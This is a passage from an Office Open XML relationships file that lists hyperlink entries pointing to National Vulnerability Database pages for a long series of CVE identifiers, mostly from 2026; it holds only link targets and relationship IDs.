Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69477" TargetMode="External" Id="rId2972" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71417" TargetMode="External" Id="rId2973" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72913" TargetMode="External" Id="rId2974" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75857" TargetMode="External" Id="rId2975" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77092" TargetMode="External" Id="rId2976" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78485" TargetMode="External" Id="rId2977" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78627" TargetMode="External" Id="rId2978" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79635" TargetMode="External" Id="rId2979" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79643" TargetMode="External" Id="rId2980" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79691" TargetMode="External" Id="rId2981" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79692" TargetMode="External" Id="rId2982" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79695" TargetMode="External" Id="rId2983" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80122" TargetMode="External" Id="rId2984" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80219" TargetMode="External" Id="rId2985" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81796" TargetMode="External" Id="rId2986" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85028" TargetMode="External" Id="rId2987" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88017" TargetMode="External" Id="rId2988" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88885" TargetMode="External" Id="rId2989" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88888" TargetMode="External" Id="rId2990" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-89087" TargetMode="External" Id="rId2991" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-0310" TargetMode="External" Id="rId2992" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-13359" TargetMode="External" Id="rId2993" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-14989" TargetMode="External" Id="rId2994" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-15984" TargetMode="External" Id="rId2995" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16649" TargetMode="External" Id="rId2996" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17037" TargetMode="External" Id="rId2997" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17553" TargetMode="External" Id="rId2998" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18164" TargetMode="External" Id="rId2999" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18255" TargetMode="External" Id="rId3000" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18406" TargetMode="External" Id="rId3001" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18411" TargetMode="External" Id="rId3002" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18579" TargetMode="External" Id="rId3003" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18844" TargetMode="External" Id="rId3004" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19224" TargetMode="External" Id="rId3005" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19769" TargetMode="External" Id="rId3006" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23855" TargetMode="External" Id="rId3007" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-27459" TargetMode="External" Id="rId3008" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-34968" TargetMode="External" Id="rId3009" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38710" TargetMode="External" Id="rId3010" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-41567" TargetMode="External" Id="rId3011" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45019" TargetMode="External" Id="rId3012" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53499" TargetMode="External" Id="rId3013" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54348" TargetMode="External" Id="rId3014" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54605" TargetMode="External" Id="rId3015" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54718" TargetMode="External" Id="rId3016" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55192" TargetMode="External" Id="rId3017" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-6431" TargetMode="External" Id="rId3018" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69246" TargetMode="External" Id="rId3019" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-69252" TargetMode="External" Id="rId3020" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-70608" TargetMode="External" Id="rId3021" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-71506" TargetMode="External" Id="rId3022" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-72825" TargetMode="External" Id="rId3023" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73613" TargetMode="External" Id="rId3024" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73624" TargetMode="External" Id="rId3025" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73769" TargetMode="External" Id="rId3026" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-73787" TargetMode="External" Id="rId3027" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74925" TargetMode="External" Id="rId3028" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-74998" TargetMode="External" Id="rId3029" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75593" TargetMode="External" Id="rId3030" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-75927" TargetMode="External" Id="rId3031" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76561" TargetMode="External" Id="rId3032" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-76562" TargetMode="External" Id="rId3033" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77233" TargetMode="External" Id="rId3034" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77263" TargetMode="External" Id="rId3035" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-77830" TargetMode="External" Id="rId3036" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-78438" TargetMode="External" Id="rId3037" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79426" TargetMode="External" Id="rId3038" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-79972" TargetMode="External" Id="rId3039" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-80127" TargetMode="External" Id="rId3040" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81349" TargetMode="External" Id="rId3041" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81431" TargetMode="External" Id="rId3042" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81754" TargetMode="External" Id="rId3043" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81806" TargetMode="External" Id="rId3044" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-81825" TargetMode="External" Id="rId3045" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82061" TargetMode="External" Id="rId3046" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-82071" TargetMode="External" Id="rId3047" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83593" TargetMode="External" Id="rId3048" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83595" TargetMode="External" Id="rId3049" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-83625" TargetMode="External" Id="rId3050" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84293" TargetMode="External" Id="rId3051" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-84387" TargetMode="External" Id="rId3052" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85160" TargetMode="External" Id="rId3053" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85165" TargetMode="External" Id="rId3054" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85166" TargetMode="External" Id="rId3055" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85213" TargetMode="External" Id="rId3056" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-85214" TargetMode="External" Id="rId3057" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86541" TargetMode="External" Id="rId3058" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-86544" TargetMode="External" Id="rId3059" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-87021" TargetMode="External" Id="rId3060" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88272" TargetMode="External" Id="rId3061" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88273" TargetMode="External" Id="rId3062" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88274" TargetMode="External" Id="rId3063" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88275" TargetMode="External" Id="rId3064" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88276" TargetMode="External" Id="rId3065" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88282" TargetMode="External" Id="rId3066" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-88891" TargetMode="External" Id="rId3067" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2020-37277" TargetMode="External" Id="rId3068" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2021-48007" TargetMode="External" Id="rId3069" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-35499" TargetMode="External" Id="rId3070" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51010" TargetMode="External" Id="rId3071" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51012" TargetMode="External" Id="rId3072" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51013" TargetMode="External" Id="rId3073" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51014" TargetMode="External" Id="rId3074" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51015" TargetMode="External" Id="rId3075" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2022-51018" TargetMode="External" Id="rId3076" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54392" TargetMode="External" Id="rId3077" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-54396" TargetMode="External" Id="rId3078" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-14047" TargetMode="External" Id="rId3079" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2024-58380" TargetMode="External" Id="rId3080" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-29419" TargetMode="External" Id="rId3081" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71400" TargetMode="External" Id="rId3082" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71403" TargetMode="External" Id="rId3083" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71409" TargetMode="External" Id="rId3084" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71412" TargetMode="External" Id="rId3085" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2025-71417" TargetMode="External" Id="rId3086" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-11573" TargetMode="External" Id="rId3087" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16007" TargetMode="External" Id="rId3088" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16118" TargetMode="External" Id="rId3089" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16281" TargetMode="External" Id="rId3090" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-16769" TargetMode="External" Id="rId3091" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-17627" TargetMode="External" Id="rId3092" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18497" TargetMode="External" Id="rId3093" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18620" TargetMode="External" Id="rId3094" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-18737" TargetMode="External" Id="rId3095" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19051" TargetMode="External" Id="rId3096" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-19671" TargetMode="External" Id="rId3097" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-20293" TargetMode="External" Id="rId3098" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-21104" TargetMode="External" Id="rId3099" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-23940" TargetMode="External" Id="rId3100" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-30865" TargetMode="External" Id="rId3101" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35219" TargetMode="External" Id="rId3102" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-35445" TargetMode="External" Id="rId3103" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-38821" TargetMode="External" Id="rId3104" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-42142" TargetMode="External" Id="rId3105" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-45808" TargetMode="External" Id="rId3106" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47682" TargetMode="External" Id="rId3107" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47704" TargetMode="External" Id="rId3108" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47735" TargetMode="External" Id="rId3109" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-47765" TargetMode="External" Id="rId3110" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48099" TargetMode="External" Id="rId3111" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48494" TargetMode="External" Id="rId3112" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-48495" TargetMode="External" Id="rId3113" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49249" TargetMode="External" Id="rId3114" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49253" TargetMode="External" Id="rId3115" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-49315" TargetMode="External" Id="rId3116" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-50165" TargetMode="External" Id="rId3117" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-52762" TargetMode="External" Id="rId3118" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53532" TargetMode="External" Id="rId3119" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53603" TargetMode="External" Id="rId3120" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53604" TargetMode="External" Id="rId3121" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53704" TargetMode="External" Id="rId3122" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53728" TargetMode="External" Id="rId3123" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-53792" TargetMode="External" Id="rId3124" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54085" TargetMode="External" Id="rId3125" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54356" TargetMode="External" Id="rId3126" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54491" TargetMode="External" Id="rId3127" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-54715" TargetMode="External" Id="rId3128" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55066" TargetMode="External" Id="rId3129" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55502" TargetMode="External" Id="rId3130" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55520" TargetMode="External" Id="rId3131" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55527" TargetMode="External" Id="rId3132" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55537" TargetMode="External" Id="rId3133" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55540" TargetMode="External" Id="rId3134" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55609" TargetMode="External" Id="rId3135" /><Relationship Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2026-55673" TargetMode="External" Id="rId3136" /><Relationship 